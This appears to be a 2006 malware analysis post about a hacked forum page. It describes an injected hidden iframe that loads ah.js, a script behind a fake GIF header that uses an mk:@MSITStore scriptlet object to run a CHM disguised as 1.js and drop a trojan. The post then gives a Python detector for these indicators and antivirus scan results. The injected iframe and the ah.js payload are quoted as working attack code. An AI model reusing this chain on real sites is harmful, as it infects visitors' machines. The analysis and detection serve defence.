Original by endurer
2006-04-08, 1st edition
Page: hxxp://www.***ai49.com/bbs/reg.asp
Code was injected in two places: <iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"></iframe>
The content of hxxp://down.***gament.net/q/f is:
<script language="javascript" src="ah.js"></script>
The content of ah.js is:
GIF89a
var GIF89a=document.location.href;
GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));
document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>');
The file poses as a GIF (the leading "GIF89a" is a decoy header) while its script downloads and runs 1.js.
1.js is actually a CHM file, which drops and runs an .exe. Kaspersky detects it as Trojan-Downloader.Win32.Delf.aet; Rising detects it as Trojan.DL.Small.hm.
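An added detection example (not code from the original post) that flags the markers of this chain: the zero-size iframe, the text/x-scriptlet OBJECT whose data URL points at mk:@MSITStore, the "GIF89a" header sitting in front of JavaScript, and a ".js" whose bytes are really a CHM (CHM files begin with the "ITSF" signature). The sample inputs are constructed to mirror the snippets above; host names and the path inside the mk: URL are placeholders.

```python
import re

# Indicators taken from the injected snippets: a hidden iframe, an OBJECT of
# type text/x-scriptlet loading an mk:@MSITStore URL (written with @ or %40),
# and the decoy GIF header / CHM signature checks below.
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*\b(?:height|width)\s*=\s*["\']?0\b[^>]*\bsrc\s*=', re.I)
SCRIPTLET_OBJECT = re.compile(
    r'type\s*=\s*["\']?text/x-scriptlet["\']?[^>]*\bdata\s*=\s*["\']?mk:', re.I)
MSITSTORE = re.compile(r'mk:(?:%40|@)MSITStore', re.I)


def scan_markup(text: str) -> list:
    """Return the names of injection indicators found in HTML or script text."""
    hits = []
    if HIDDEN_IFRAME.search(text):
        hits.append('hidden-iframe')
    if SCRIPTLET_OBJECT.search(text) or MSITSTORE.search(text):
        hits.append('msitstore-scriptlet-object')
    return hits


def classify_payload(name: str, data: bytes) -> str:
    """Compare what a fetched file claims to be with what its bytes actually are."""
    if data.startswith(b'ITSF'):                      # CHM container signature
        return 'chm-disguised-as-' + name.rsplit('.', 1)[-1].lower()
    if data[:6] in (b'GIF89a', b'GIF87a'):
        # A real GIF continues with a binary logical-screen descriptor; script
        # keywords right after the signature mean the header is only a decoy.
        head = data[6:200]
        if re.search(rb'\b(?:var|document|function)\b', head):
            return 'gif-header-over-script'
        return 'gif'
    return 'unknown'


# Constructed samples mirroring the post's snippets (hosts/paths are placeholders).
SAMPLE_PAGE = ('<html><body>hello'
               '<iframe height=0 width=0 src="http://down.example.invalid/q/f"></iframe>'
               '</body></html>')
SAMPLE_AHJS = (b'GIF89a\r\nvar GIF89a=document.location.href;'
               b'document.write(\'<OBJECT Width=0 Height=0 type="text/x-scriptlet" '
               b'data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21x%2f1.js::/%23"></OBJECT>\');')
SAMPLE_1JS = b'ITSF\x03\x00\x00\x00' + b'\x00' * 24   # CHM signature, padded

if __name__ == '__main__':
    print(scan_markup(SAMPLE_PAGE))                      # ['hidden-iframe']
    print(scan_markup(SAMPLE_AHJS.decode('latin-1')))    # ['msitstore-scriptlet-object']
    print(classify_payload('ah.js', SAMPLE_AHJS))        # gif-header-over-script
    print(classify_payload('1.js', SAMPLE_1JS))          # chm-disguised-as-js
```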
File: | 1.js
Status: | INFECTED/MALWARE
MD5: | 617449ed78325096128e604f1e9f9d30
Packers detected: | -

Scanner results
AntiVir | Found Heuristic/Trojan.Downloader (probable variant)
ArcaVir | Found Trojan.Downloader.Delf.Aet
Avast | Found nothing
AVG Antivirus | Found nothing
BitDefender | Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET
ClamAV | Found Exploit.HTML.ObjCode-2
Dr.Web | Found Exploit.CodeBase, Trojan.DownLoader.6966
F-Prot Antivirus | Found HTML/ObjCode@expl
Fortinet | Found nothing
Kaspersky Anti-Virus | Found Trojan-Downloader.Win32.Delf.aet
NOD32 | Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
Norman Virus Control | Found nothing
UNA | Found nothing
VirusBuster | Found nothing
VBA32 | Found Trojan-Downloader.Win32.Delf.aet